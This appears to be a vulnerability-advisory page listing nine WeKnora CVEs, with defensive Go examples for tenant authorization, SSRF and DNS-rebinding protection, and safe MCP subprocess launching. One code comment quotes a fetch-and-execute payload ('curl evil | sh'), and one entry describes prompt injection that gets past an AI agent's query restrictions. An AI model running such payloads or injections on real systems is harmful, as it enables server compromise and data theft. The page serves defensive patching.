
Weknora

9 CVEs for this product


CVE-2026-30861 | Go | CRITICAL | PoC available | Patch available | Act Now

OS command injection in WeKnora versions from 0.2.5 onwards allows authenticated users to execute arbitrary system commands on the server. CVSS 3.1 base score 9.9 with changed scope; a public PoC is available.

Tags: RCE, Command Injection, AI / ML, Weknora, Suse
References: NVD, GitHub
CVSS 3.1: 9.9 | EPSS: 0.2%
CVE-2026-30860 | Go | CRITICAL | PoC available | Patch available | Act Now

SQL injection in the WeKnora LLM document understanding framework allows authenticated users to extract arbitrary database contents. CVSS 3.1 base score 9.9 with changed scope; a public PoC is available.

Tags: RCE, SQLi, PostgreSQL, AI / ML, Weknora, +1
References: NVD, GitHub
CVSS 3.1: 9.9 | EPSS: 0.2%
CVE-2026-30859 | Go | MEDIUM | Patch available | This Month

WeKnora versions prior to 0.2.12 do not isolate tenants in database queries, so any authenticated user can read sensitive data belonging to other tenants, including API keys, model configurations, and private messages. Multi-tenant deployments are affected: account-level access controls do not stop cross-tenant data exfiltration. Patch status is inconsistent in this entry (patch badge, but the text reports none); confirm the fixed release against the GitHub advisory before treating 0.2.12 as safe.

Tags: Authentication Bypass, Information Disclosure, AI / ML, Weknora, Suse
References: NVD, GitHub
CVSS 3.1: 5.3 | EPSS: 0.0%
CVE-2026-30858 | Go | MEDIUM | PoC available | Patch available | This Month

DNS rebinding in WeKnora's web_fetch tool lets authenticated attackers bypass URL validation and reach internal resources and private IP addresses from the server: a malicious domain resolves to a public address while the URL is being validated and to an internal one when the request is actually made. Versions prior to 0.3.0 are affected and public exploit code exists. An attacker can use this to reach sensitive local services and exfiltrate data from the affected host. Patch status is inconsistent in this entry (patch badge, but the text reports none); confirm the fixed release against the GitHub advisory.

Tags: DNS, AI / ML, Weknora, Suse
References: NVD, GitHub
CVSS 3.1: 6.5 | EPSS: 0.1%
CVE-2026-30857 | Go | MEDIUM | PoC available | Patch available | This Month

WeKnora versions up to 0.3.0 are affected by an authorization bypass through a user-controlled key (CWE-639): an object identifier taken from the request is used to look up the object without checking that the caller is entitled to it. CVSS 3.1 base score 5.3; a public PoC is available.

Tags: Authentication Bypass, AI / ML, Weknora, Suse
References: NVD, GitHub
CVSS 3.1: 5.3 | EPSS: 0.0%
CVE-2026-30855 | Go | HIGH | PoC available | Patch available | This Week

Insufficient authorization checks in WeKnora's tenant management endpoints allow any authenticated user to read, modify, or delete arbitrary tenants, and public exploit code is available. Because the application allows open registration, an unauthenticated attacker can register an account and use this flaw for cross-tenant account takeover and data destruction. Versions prior to 0.3.2 are affected. Patch status is inconsistent in this entry (patch badge, but the text reports none); confirm the fixed release against the GitHub advisory.

Tags: Authentication Bypass, AI / ML, Weknora, Suse
References: NVD, GitHub
CVSS 3.1: 8.8 | EPSS: 0.1%
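The three entries above (CVE-2026-30859, CVE-2026-30857 and CVE-2026-30855) share one root cause: an authenticated request names the object it wants, and the server looks that object up without checking that the caller's tenant owns it. The Go program below is an added example written for this page, not WeKnora code; the route, the Tenant shape, the principal type and the two sample tenants are constructed, and the project's real handlers are not shown here. It sends the same cross-tenant request to a handler with the vulnerable shape and to a hardened one, using net/http/httptest so it runs offline.

```go
package main

import (
	"context"
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Tenant is a stand-in for the record a tenant-management endpoint returns.
// Constructed sample shape, not WeKnora's schema.
type Tenant struct {
	ID     string `json:"id"`
	Name   string `json:"name"`
	APIKey string `json:"api_key"`
}

// principal is what authentication established: who the caller is, which tenant the
// session belongs to, and whether the caller is a platform administrator.
type principal struct {
	UserID   string
	TenantID string
	Admin    bool
}

type principalKey struct{}

// Constructed sample data: two tenants, each with a secret that must not cross over.
var tenants = map[string]Tenant{
	"t-100": {ID: "t-100", Name: "alpha", APIKey: "sk-alpha-secret"},
	"t-200": {ID: "t-200", Name: "bravo", APIKey: "sk-bravo-secret"},
}

// withPrincipal stands in for the auth middleware: the principal is bound to the
// request from the session, never from a parameter the caller controls.
func withPrincipal(p principal, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		next.ServeHTTP(w, r.WithContext(context.WithValue(r.Context(), principalKey{}, p)))
	})
}

func tenantIDFromPath(r *http.Request) string {
	return strings.TrimPrefix(r.URL.Path, "/api/v1/tenants/")
}

// vulnerableGetTenant is authenticated but not authorized: the lookup key is taken
// straight from the URL, so any logged-in user can read any tenant (CWE-639, IDOR).
func vulnerableGetTenant(w http.ResponseWriter, r *http.Request) {
	t, ok := tenants[tenantIDFromPath(r)]
	if !ok {
		http.NotFound(w, r)
		return
	}
	json.NewEncoder(w).Encode(t)
}

// hardenedGetTenant honours the caller-supplied id only when it matches the tenant the
// session is bound to, or the caller is a platform admin. The check runs before the
// lookup, and a mismatch is answered with 404 so the endpoint does not confirm that
// other tenant ids exist.
func hardenedGetTenant(w http.ResponseWriter, r *http.Request) {
	p, ok := r.Context().Value(principalKey{}).(principal)
	if !ok {
		http.Error(w, "unauthenticated", http.StatusUnauthorized)
		return
	}
	id := tenantIDFromPath(r)
	if !p.Admin && id != p.TenantID {
		http.NotFound(w, r)
		return
	}
	t, ok := tenants[id]
	if !ok {
		http.NotFound(w, r)
		return
	}
	json.NewEncoder(w).Encode(t)
}

// fetchTenantAs issues GET /api/v1/tenants/{id} as the given principal against the
// given handler and returns the status code and whatever API key came back.
func fetchTenantAs(h http.HandlerFunc, p principal, id string) (int, string) {
	srv := httptest.NewServer(withPrincipal(p, h))
	defer srv.Close()
	resp, err := srv.Client().Get(srv.URL + "/api/v1/tenants/" + id)
	if err != nil {
		return 0, ""
	}
	defer resp.Body.Close()
	var t Tenant
	_ = json.NewDecoder(resp.Body).Decode(&t)
	return resp.StatusCode, t.APIKey
}

func main() {
	// A user of tenant t-200 asks for tenant t-100's record.
	attacker := principal{UserID: "u-9", TenantID: "t-200"}
	code, key := fetchTenantAs(vulnerableGetTenant, attacker, "t-100")
	fmt.Printf("vulnerable: %d key=%q\n", code, key)
	code, key = fetchTenantAs(hardenedGetTenant, attacker, "t-100")
	fmt.Printf("hardened:   %d key=%q\n", code, key)
}
```

The same rule applies to update and delete handlers and to list endpoints (filter by the session's tenant, never by a tenant id in the query string); for the open-registration case in CVE-2026-30855 the authentication step is free to the attacker, so authorization is the only control that matters.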
CVE-2026-30247 | Go | MEDIUM | PoC available | Patch available | This Month

WeKnora's document import feature is vulnerable to Server-Side Request Forgery through HTTP redirects: the initial URL passes validation, but redirect targets are not held to the same checks, so unauthenticated remote attackers can reach internal services despite backend blocks on private IPs and metadata endpoints. Versions prior to 0.2.12 are affected when deployed in Docker, where host.docker.internal (the address of the Docker host) is not blocked. Public exploit code exists. Patch status is inconsistent in this entry (patch badge, but the text reports none); confirm the fixed release against the GitHub advisory.

Tags: Docker, SSRF, AI / ML, Weknora, Suse
References: NVD, GitHub
CVSS 3.1: 5.9 | EPSS: 0.0%
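CVE-2026-30858 (rebinding) and CVE-2026-30247 (redirects) are two ways of defeating the same control: a URL check that runs once, up front, on a hostname. The fix for both is to decide at connection time, on the IP address that is actually dialed, and to do so for every hop. The Go program below is an added example written for this page, not WeKnora's web_fetch or document-import code; the scripted resolver, the host names and the local test server that stands in for the attacker's site are constructed so the demonstration runs offline, and the connect hook is what a production build would replace with a real net.Dialer call on the vetted IP.

```go
package main

import (
	"context"
	"errors"
	"fmt"
	"net"
	"net/http"
	"net/http/httptest"
	"time"
)

var errBlocked = errors.New("egress blocked: resolved address is not public")

// isPublicIP rejects loopback, RFC 1918/ULA, link-local (169.254.0.0/16 covers cloud
// metadata), multicast and unspecified ranges. IsPrivate also covers the Docker bridge
// gateway (172.17.0.1 by default) that host.docker.internal resolves to.
func isPublicIP(ip net.IP) bool {
	if v4 := ip.To4(); v4 != nil {
		ip = v4
	}
	return !(ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() ||
		ip.IsLinkLocalMulticast() || ip.IsInterfaceLocalMulticast() ||
		ip.IsMulticast() || ip.IsUnspecified())
}

// resolver stands in for DNS so the example runs offline: each lookup pops the next
// scripted answer (the last one sticks), as a rebinding attacker's TTL-0 server would.
type resolver map[string][]net.IP

func (r resolver) lookup(host string) (net.IP, error) {
	q := r[host]
	if len(q) == 0 {
		return nil, fmt.Errorf("no such host: %s", host)
	}
	if len(q) > 1 {
		r[host] = q[1:]
	}
	return q[0], nil
}

// pinnedClient resolves the host inside the dialer, checks the address it just resolved
// and connects to that same address, so check and use cannot diverge; the dialer runs for
// every connection, so each redirect hop is checked too. In production connect is
// (&net.Dialer{}).DialContext(ctx, "tcp", net.JoinHostPort(ip.String(), port)); TLS still
// verifies the URL's hostname because Transport takes ServerName from the URL, not the IP.
func pinnedClient(r resolver, connect func(context.Context, net.IP, string) (net.Conn, error)) *http.Client {
	return &http.Client{
		Timeout: 5 * time.Second,
		Transport: &http.Transport{
			DialContext: func(ctx context.Context, _, addr string) (net.Conn, error) {
				host, port, _ := net.SplitHostPort(addr) // Transport always passes host:port
				ip, err := r.lookup(host)
				if err != nil {
					return nil, err
				}
				if !isPublicIP(ip) {
					return nil, fmt.Errorf("%w: %s -> %s", errBlocked, host, ip)
				}
				return connect(ctx, ip, port)
			},
		},
	}
}

// naiveCheck is the vulnerable shape: validate one resolution up front, then let the
// HTTP client resolve the name a second time when it connects.
func naiveCheck(r resolver, host string) bool {
	ip, err := r.lookup(host)
	return err == nil && isPublicIP(ip)
}

// demo stages both attacks against a local server that plays the attacker's public host;
// its /doc endpoint 302s to host.docker.internal, the redirect-SSRF shape.
func demo() (naivePasses bool, rebindErr, firstHopErr, redirectErr error) {
	attacker := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, req *http.Request) {
		if req.URL.Path == "/doc" {
			http.Redirect(w, req, "http://host.docker.internal/secret", http.StatusFound)
			return
		}
		fmt.Fprint(w, "attacker page")
	}))
	defer attacker.Close()
	connect := func(ctx context.Context, _ net.IP, _ string) (net.Conn, error) {
		return (&net.Dialer{}).DialContext(ctx, "tcp", attacker.Listener.Addr().String()) // stays local
	}
	r := resolver{
		"rebind.example":       {net.ParseIP("203.0.113.10"), net.ParseIP("127.0.0.1")},
		"files.example":        {net.ParseIP("203.0.113.20")},
		"host.docker.internal": {net.ParseIP("172.17.0.1")},
	}
	get := func(u string) error {
		resp, err := pinnedClient(r, connect).Get(u)
		if err == nil {
			resp.Body.Close()
		}
		return err
	}
	naivePasses = naiveCheck(r, "rebind.example") // sees 203.0.113.10 and passes
	rebindErr = get("http://rebind.example/")      // dial-time answer is 127.0.0.1: refused
	firstHopErr = get("http://files.example/")     // genuinely public: allowed
	redirectErr = get("http://files.example/doc")  // 302 hop resolves to 172.17.0.1: refused
	return
}

func main() {
	fmt.Println(demo())
}
```

Two practical notes. The dialer-based check makes a separate CheckRedirect hook unnecessary for the address policy, though one is still useful to cap the hop count and to refuse scheme changes. And because the policy is applied to the resolved address rather than the hostname, names such as host.docker.internal, localtest.me-style wildcards, or a custom name in /etc/hosts are all handled the same way: whatever they resolve to is what gets judged.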
CVE-2026-22688 | Go | CRITICAL | PoC available | Patch available | Act Now

The WeKnora LLM framework before 0.2.5 allows authenticated users to inject MCP stdio commands that the server executes as subprocesses. A public PoC is available; fixed in 0.2.5.

Tags: Command Injection, AI / ML, Weknora, Suse
References: NVD, GitHub
CVSS 3.1: 9.9 | EPSS: 0.3%
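CVE-2026-22688 and CVE-2026-30861 above both come down to the server launching a subprocess whose program name, arguments and environment are chosen by a tenant. A stdio MCP server is, by definition, a child process the host talks to over pipes, so the launch path has to be designed so that nothing the tenant sends is ever interpreted as a command. The Go program below is an added example written for this page, not WeKnora's MCP code: the userMCPConfig shape, the registry, the template name, the binary path and the slot pattern are all constructed for illustration. It contrasts the vulnerable shape with an operator-owned registry of templates in which tenants only fill validated slots.

```go
package main

import (
	"context"
	"errors"
	"fmt"
	"os/exec"
	"regexp"
	"strings"
)

// userMCPConfig is the shape a tenant submits when registering a stdio MCP server.
// Constructed example of the pattern, not WeKnora's actual schema.
type userMCPConfig struct {
	Command string            `json:"command"`
	Args    []string          `json:"args"`
	Env     map[string]string `json:"env"`
}

// vulnerableCommand turns the tenant's config straight into a server-side subprocess:
// argv[0], every argument and the environment are attacker-chosen, so
// {"command":"bash","args":["-c","curl evil | sh"]} is a perfectly valid "MCP server".
func vulnerableCommand(cfg userMCPConfig) *exec.Cmd {
	cmd := exec.Command(cfg.Command, cfg.Args...)
	for k, v := range cfg.Env {
		cmd.Env = append(cmd.Env, k+"="+v)
	}
	return cmd
}

// serverTemplate is registered by the operator, never by a tenant: an absolute binary,
// a fixed argv, and named slots ("{name}") the tenant may fill, each bound to an
// anchored pattern that cannot start with "-" (no option injection into the binary).
type serverTemplate struct {
	Path  string
	Args  []string
	Slots map[string]*regexp.Regexp
}

type launchRequest struct {
	Template string
	Params   map[string]string
}

var errRejected = errors.New("mcp launch rejected")

// buildCommand resolves a tenant request against the operator registry. The tenant
// chooses a template by name and supplies slot values only; nothing it sends is ever
// interpreted by a shell, and the child's environment is fixed rather than inherited.
func buildCommand(ctx context.Context, registry map[string]serverTemplate, req launchRequest) (*exec.Cmd, error) {
	tpl, ok := registry[req.Template]
	if !ok {
		return nil, fmt.Errorf("%w: unknown template %q", errRejected, req.Template)
	}
	for name := range req.Params {
		if _, ok := tpl.Slots[name]; !ok {
			return nil, fmt.Errorf("%w: unexpected parameter %q", errRejected, name)
		}
	}
	args := make([]string, 0, len(tpl.Args))
	for _, a := range tpl.Args {
		if !strings.HasPrefix(a, "{") || !strings.HasSuffix(a, "}") {
			args = append(args, a) // literal from the template
			continue
		}
		name := strings.Trim(a, "{}")
		pat, ok := tpl.Slots[name]
		val, given := req.Params[name]
		if !ok || !given || !pat.MatchString(val) {
			return nil, fmt.Errorf("%w: missing or invalid value for %q", errRejected, name)
		}
		args = append(args, val) // one argv element, handed verbatim to execve
	}
	cmd := exec.CommandContext(ctx, tpl.Path, args...)
	cmd.Env = []string{"PATH=/usr/bin:/bin", "HOME=/nonexistent"} // fixed, never tenant-supplied
	cmd.Dir = "/"
	return cmd, nil
}

// demoRegistry is an operator-side registry with one hypothetical filesystem MCP server;
// the binary path and flag are placeholders, not real WeKnora configuration.
func demoRegistry() map[string]serverTemplate {
	return map[string]serverTemplate{
		"filesystem": {
			Path:  "/usr/local/bin/mcp-server-filesystem",
			Args:  []string{"--root", "{root}"},
			Slots: map[string]*regexp.Regexp{"root": regexp.MustCompile(`^/srv/kb/[a-z0-9-]+$`)},
		},
	}
}

func main() {
	reg := demoRegistry()
	for _, req := range []launchRequest{
		{"filesystem", map[string]string{"root": "/srv/kb/tenant-7"}},
		{"filesystem", map[string]string{"root": "/srv/kb/x; id"}},
		{"bash", map[string]string{"c": "id"}},
	} {
		cmd, err := buildCommand(context.Background(), reg, req)
		if err != nil {
			fmt.Println("rejected:", err)
			continue
		}
		fmt.Println("would exec:", cmd.Args)
	}
}
```

The allowlist is the control; the slot patterns are there so a tenant cannot smuggle options or paths into the one binary it is allowed to start. Running the child under a separate uid, a seccomp or AppArmor profile and a cgroup is the next layer, and it matters because an MCP server is still a process that reads whatever files its root points at.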
CVE-2026-22687 | Go | MEDIUM | PoC available | Patch available | This Month

WeKnora versions before 0.2.5 allow unauthenticated attackers to bypass database query restrictions through prompt injection when the Agent service is enabled, giving unauthorized access to sensitive data. Public exploit code exists. The flaw sits in the framework's document understanding and semantic retrieval capabilities. Fixed in version 0.2.5 and later.

Tags: SQLi, AI / ML, Weknora, Suse
References: NVD, GitHub
CVSS 3.1: 5.6 | EPSS: 0.1%